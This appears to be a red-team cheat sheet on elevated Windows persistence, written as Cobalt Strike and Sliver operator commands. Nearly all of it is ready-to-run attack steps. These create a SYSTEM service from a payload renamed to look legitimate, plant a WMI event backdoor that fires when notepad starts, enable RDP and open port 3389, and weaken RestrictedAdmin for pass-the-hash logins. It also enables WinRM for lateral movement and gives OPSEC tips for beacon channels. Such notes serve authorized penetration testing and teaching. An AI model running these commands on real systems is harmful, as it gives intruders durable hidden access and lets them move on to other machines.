Elevated Persistence
Persistence mechanisms that require elevated (high integrity / SYSTEM) access. More durable than userland persistence as they survive user logoff and run with higher privileges.
OPSEC: SYSTEM processes cannot authenticate to web proxies — use P2P (SMB/TCP) or DNS beacons for SYSTEM-level persistence, not HTTP.
These techniques must be performed from a high-integrity beacon.
See c. Artifact Removal for removal commands and post-engagement cleanup procedures.
Windows Services (SYSTEM)
Create a new service that runs a payload as SYSTEM on boot. Unlike exploiting existing services for priv esc, this doesn’t break legitimate services.
Cobalt Strike
# 1. Upload svc binary and rename
beacon> cd C:\Windows
beacon> upload C:\Payloads\tcp-local_x64.svc.exe
beacon> mv tcp-local_x64.svc.exe legit-svc.exe
# 2. Create the service via SharPersist
beacon> execute-assembly SharPersist.exe -t service -c "C:\Windows\legit-svc.exe" -n "legit-svc" -m addManual
# Native sc create
sc create "legit-svc" binPath= "C:\Windows\legit-svc.exe" start= auto obj= "LocalSystem"
sc start legit-svc
# Remove
sc stop legit-svc
sc delete legit-svcWMI Event Subscriptions
Persistent WMI events survive reboots and execute payloads when a trigger condition is met. Built from three WMI classes:
- EventConsumer — the action to perform (execute payload)
- EventFilter — the trigger (any WMI query — process start, logon, timer, etc.)
- FilterToConsumerBinding — links consumer and filter together
PowerLurk simplifies creating these events.
Cobalt Strike
# 1. Upload payload
beacon> cd C:\Windows
beacon> upload C:\Payloads\dns_x64.exe
# 2. Import PowerLurk and create the event
beacon> powershell-import C:\Tools\PowerLurk.ps1
beacon> powershell Register-MaliciousWmiEvent -EventName WmiBackdoor -PermanentCommand "C:\Windows\dns_x64.exe" -Trigger ProcessStart -ProcessName notepad.exe
# Cleanup
beacon> powershell Get-WmiEvent -Name WmiBackdoor | Remove-WmiObjectEnable RDP
Enable Remote Desktop and configure firewall rules. Useful for interactive access and GUI-dependent tasks.
Sliver
# Enable RDP
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh firewall add portopening TCP 3389 "Remote Desktop"
# Disable RestrictedAdmin mode (allows Pass-the-Hash over RDP)
New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name DisableRestrictedAdmin -Value 0Manual
# RDP with Pass-the-Hash (requires DisableRestrictedAdmin = 0)
xfreerdp /u:Administrator /pth:NTHASH /v:TARGET_IP /cert:ignore /dynamic-resolutionEnable WinRM
Enable PowerShell remoting for lateral movement via Enter-PSSession, Invoke-Command, etc.
Sliver
# Enable directly
Enable-PSRemoting -Force
# Via SharpSh within Sliver
sharpsh -- -c '"Enable-PSRemoting -Force"'